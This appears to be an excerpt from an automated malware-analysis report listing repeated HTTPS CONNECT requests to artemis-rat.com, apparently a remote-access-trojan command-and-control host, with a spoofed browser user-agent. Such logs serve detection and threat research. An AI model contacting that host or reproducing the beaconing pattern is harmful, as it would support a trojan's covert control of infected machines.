                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.com
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
